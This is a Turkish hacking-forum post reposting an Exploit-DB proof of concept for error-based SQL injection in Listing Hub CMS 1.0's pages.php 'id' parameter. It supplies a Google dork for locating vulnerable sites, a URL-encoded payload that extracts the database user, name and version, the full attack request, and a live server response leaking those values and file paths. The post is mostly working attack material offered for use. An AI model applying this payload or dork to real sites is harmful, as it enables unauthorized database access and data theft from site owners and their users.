İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

Listing Hub CMS 1.0 - 'pages.php id' SQL Injection

20-02-2019 20:59
#1
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
653
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
Ticaret:
(0) %
# Exploit Title/Exploit Başlığı:Listing Hub CMS 1.0 - 'pages.php id' SQL Injection
# Dork: inurl:"pages.php?title=privacy-policy"
# CVE: N/A
# Date/Tarih: 14 Şubat 2019
# Exploit Author/Exploit Yazarı: Deyaa Muhammad
# Vendor Homepage/Yapımcı Sitesi: https://themerig.com/
# Software Link/Yazılımın Linki: https://codecanyon.net/item/listing-...theme/21361294
# Demo Website:https://listing-hub.themerig.com
# Version/Versiyon: 1.0
# Tested on/Test Edilen Sistem: WIN7_x68/Linux

# POC:
1. Şu adrese erişin https://[PATH]/pages.php?title=privacy-policy&id=2
2. Aşağıdaki payload ı yüklereyek " error-based" SQL Injection yapabilirsiniz.
2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT( *),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,v ersion(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORM ATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20-


# Request/İstek:
GET /pages.php?id=2%27%20AND%20(SELECT%204588%20FROM(SE LECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,databa se(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20 FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x )a)--%20- HTTP/1.1
Accept-Encoding: gzip, deflate
Host: server
Accept: */*
Connection: close
Cache-Control: no-cache


#Response/Yanıt

X-Powered-By: PHP/5.6.40
Set-Cookie: PHPSESSID=icrk7uvmqmpsmb4ndt56me8564; path=/
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 1149
Vary: Accept-Encoding
Date/Tarih: Cuma, 15 Şubat 2019 06:16:21 GMT
Accept-Ranges/Kabul Edilen Aralıklar: bytes
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="35,39,43"
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang=""> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang=""> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9" lang=""> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js" lang="eng">
<head>
<m e t a http-equiv="Content-Type" content="text/html; charset=UTF-8">
<m e t a http-equiv="X-UA-Compatible" content="IE=edge">
<m e t a name="viewport" content="width=device-width, initial-scale=1.0">
<m e t a name="robots" content="index,follow"><br />
<b>Notice</b>: Undefined index: title in <b>/home2/otomati5/server/includes/head.php</b> on line <b>71</b><br />
<br />
<b>Warning</b>: PDO: : query(): SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry ': : otomati5_hub@localhost: : otomati5_hub: :10.1.37-MariaDB-cll-lve : ' for key 'group_key' in <b>/home2/otomati5/listing-hub.themerig.com/includes/head.php</b> on line <b>75</b><br />
<br />
<b>Fatal error</b>: Call to a member function fetch() on boolean in <b>/home2/otomati5/listing-hub.themerig.com/includes/head.php</b> on line <b>75</b><br />




Exploit Linki : https://www.exploit-db.com/exploits/46419
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE



Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı